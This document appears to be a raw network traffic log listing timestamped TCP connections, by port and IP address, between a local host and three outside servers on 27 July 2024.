Jul 27, 2024 07:43:57.583563089 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.583587885 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583621979 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583627939 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.583655119 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583688974 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583703041 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.583723068 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583758116 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583770990 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.583794117 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583827972 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583841085 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.583859921 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583893061 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583906889 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.583929062 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583961010 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583976030 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.583995104 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584029913 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584036112 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.584064960 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584098101 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584110022 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.584151983 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584203959 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584203959 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.584239006 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584270954 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584285021 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.584306002 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584335089 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584358931 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.584388018 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584420919 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584434032 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.584454060 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584505081 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584534883 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.584538937 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584573030 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584585905 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.584608078 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584640980 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584652901 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.584680080 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584729910 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.584800959 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584832907 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584866047 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584880114 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.584899902 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584932089 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584939003 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.584964991 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.584997892 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585011005 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.585032940 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585066080 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585078001 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.585098028 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585130930 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585160017 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.585167885 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585201979 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585211992 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.585237026 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585269928 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585282087 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.585306883 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585340977 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585352898 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.585376024 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585417032 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585422993 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.585459948 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585505962 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.585575104 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585607052 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585639954 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585652113 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.585674047 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585707903 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585720062 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.585741043 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585773945 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585789919 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.585813046 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585845947 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585870028 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.585958004 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.585992098 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.586015940 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.586025953 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.586059093 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.586072922 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.586385965 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.586473942 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.668752909 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.668776989 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.668786049 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.668793917 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.668802023 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.668808937 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.668818951 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.669090986 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.669486046 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.669553995 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.669609070 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.669641972 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.669652939 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.669677973 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.669688940 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.669712067 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.669718981 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.669749022 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.669783115 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.669816971 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.669848919 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.669882059 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.669915915 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.669958115 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.669970989 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670008898 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670020103 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.670046091 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670077085 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670087099 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.670113087 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670146942 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670181990 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670191050 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.670233965 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670249939 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.670288086 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670327902 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670335054 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.670387030 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670435905 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.670435905 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670473099 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670507908 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670525074 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.670567036 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670599937 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670609951 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.670650959 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670701981 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670710087 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.670737028 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670768023 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670794964 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.670823097 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670856953 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670871973 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.670892954 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670929909 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.670944929 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.670981884 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671015024 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671036005 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.671049118 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671091080 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671093941 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.671124935 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671156883 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671169996 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.671190023 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671222925 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671255112 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671264887 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.671288013 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671314001 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.671322107 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671355963 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671382904 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.671391010 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671442032 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.671442986 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671479940 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671529055 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671540022 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.671565056 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671597958 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671611071 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.671632051 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671684027 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671691895 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.671717882 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671753883 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671766996 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.671789885 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671830893 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.671835899 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671888113 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671920061 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671936035 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.671952963 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671988010 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.671993971 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.672023058 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672055006 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672069073 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.672090054 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672122002 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672137976 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.672153950 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672188044 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672200918 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.672221899 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672275066 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.672276020 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672311068 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672343969 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672372103 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.672378063 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672411919 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672436953 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.672445059 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672477961 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672538996 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.672540903 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672574043 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672584057 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.672605991 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672638893 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672652960 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.672672033 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672703981 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672718048 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.672735929 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672770023 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672782898 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.672806025 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672837973 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672859907 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.672869921 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672905922 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672908068 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.672939062 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672971964 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.672983885 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.673007965 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.673041105 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.673053026 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.673079014 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.673110962 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.673137903 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.673145056 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.673177958 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.673203945 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.673213959 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.673247099 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.673255920 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.673280954 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.673316002 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.673326015 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.724834919 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.755462885 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.755511045 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.755544901 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.755577087 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.755609035 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.755640984 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.755676985 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.755695105 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.755695105 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.755695105 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.802813053 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.837238073 CEST	62249	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:57.842473984 CEST	80	62249	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:57.844466925 CEST	62249	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:57.844809055 CEST	62249	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:57.844809055 CEST	62249	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:57.850039959 CEST	80	62249	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:57.850069046 CEST	80	62249	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:58.888978004 CEST	80	62249	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:58.889090061 CEST	80	62249	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:58.889158964 CEST	62249	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:58.889244080 CEST	62249	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:58.891499996 CEST	62250	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:58.894124031 CEST	80	62249	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:58.896461964 CEST	80	62250	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:58.896600008 CEST	62250	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:58.896781921 CEST	62250	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:58.896815062 CEST	62250	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:58.901678085 CEST	80	62250	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:58.901707888 CEST	80	62250	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:59.939809084 CEST	80	62250	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:59.940712929 CEST	80	62250	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:59.940793037 CEST	62250	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:59.940887928 CEST	62250	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:59.943034887 CEST	62251	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:59.949465036 CEST	80	62250	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:59.950975895 CEST	80	62251	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:59.951047897 CEST	62251	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:59.951180935 CEST	62251	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:59.951180935 CEST	62251	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:59.958619118 CEST	80	62251	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:59.959625959 CEST	80	62251	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:01.039027929 CEST	80	62251	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:01.039071083 CEST	80	62251	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:01.039158106 CEST	62251	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:01.039350986 CEST	62251	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:01.046535015 CEST	80	62251	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:01.071635962 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:01.071662903 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:01.071748018 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:01.072165966 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:01.072181940 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:01.821876049 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:01.821949959 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:01.823570967 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:01.823581934 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:01.823792934 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:01.832276106 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:01.876502037 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.152987003 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:44:02.153273106 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:44:02.153367996 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:44:02.158291101 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:44:02.234097004 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.287153959 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.375744104 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.375756025 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.375808954 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.375819921 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.375830889 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.375854015 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.375864029 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:02.375868082 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:02.375874043 CEST	62252	443	192.168.2.4	185.149.100.242
